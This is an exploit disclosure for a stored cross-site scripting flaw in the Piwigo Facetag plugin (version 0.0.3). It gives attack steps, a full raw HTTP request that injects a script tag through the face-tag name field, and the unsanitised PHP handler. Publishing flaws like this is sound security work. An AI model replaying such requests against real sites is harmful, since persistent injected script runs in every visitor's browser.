# Exploit Title: Piwigo plugin Facetag , Persistent XSS 
# Date: 31-05-2017
# Extension Version: 0.0.3
# Software Link: http://piwigo.org/basics/downloads
# Extension link : http://piwigo.org/ext/extension_view.php?eid=845
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/
# Category: webapps


######## Description ########
<!--
	What is Piwigo ?
	Piwigo is photo gallery software for the web, built by an active community of users and developers.Extensions make Piwigo easily customizable. Icing on the cake, Piwigo is free and open source.

	Facetag Extension in piwigo.
	This plugin extends piwigo with the function to tag faces in pictures. It adds an additional button on photo pages that let you tag a face on the picture.
-->

######## Video PoC and Article ########

https://www.youtube.com/watch?v=_ha7XBT_Omo
http://touhidshaikh.com/blog/poc/facetag-ext-piwigo-stored-xss/



######## Attact Description  ########
<!--

	Facetag Extention provide additional button on photo page for visitor or user to tag any name oh that image.


NOTE : "www.test.touhid" this domain not registed on internet. This domain host in  touhid's local machine.

==>START<==
Any visitor or registered user can perform this.

FaceTag Extension adds an additional button on photo pages that let you tag a face on the picture for visitor and registered user.

click on that button after that click on image where you want to tag a name just enter you malicious javascript and press Enter its stored as a keyword. 

Your Javascript Stored in Server's Database and execute every time when any visitor visit that photo or in keyword page.

-->

######## Proof of Concept ########



-----------------------------OUR REQUEST--------------
POST /ws.php?format=json&method=facetag.changeTag HTTP/1.1
Host: www.test.touhid
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.test.touhid/picture.php?/12/category/3
Content-Length: 129
Cookie: pwg_id=9i94hdpsn2dfulaecm6hqvsj77
Connection: close
Pragma: no-cache
Cache-Control: no-cache

id=-2&imageId=12&name=Hello%3Cscript%3Eprompt(22)%3C%2Fscript%3E&top=0.40539324471120086&left=0.4577020202020202&width=0&height=0

---------------------------END HERE---------------------------

Stored in database.(SQl query to stored tag in dataabase)
-------------------ws_function.php(facetag plugin)--------------

function facetag_changeTag($params, &$service) {
	if (!$service->isPost()) {
      return new PwgError(405, "This method requires HTTP POST");
    }
	
	$id = $params['id'];
	
	$answer = array();
	if($id < 0) {
		$answer['action'] = "INSERT";
		$answer['id'] = addImageFaceTag($params['imageId'], $params['name'], $params['top'], $params['left'], $params['width'], $params['height']);
	} elseif($params['name'] == "__DELETE__") {
		$answer['action'] = "DELETE";
		$answer['id'] = removeImageFaceTag($id, $params['imageId']);
	} else {
		$answer['action'] = "UPDATE";
		removeImageFaceTag($id, $params['imageId']);
		$answer['id'] = addImageFaceTag($params['imageId'], $params['name'], $params['top'], $params['left'], $params['width'], $params['height']);
	}
	
	return json_encode($answer);
}

--------------------------END HERE---------------------------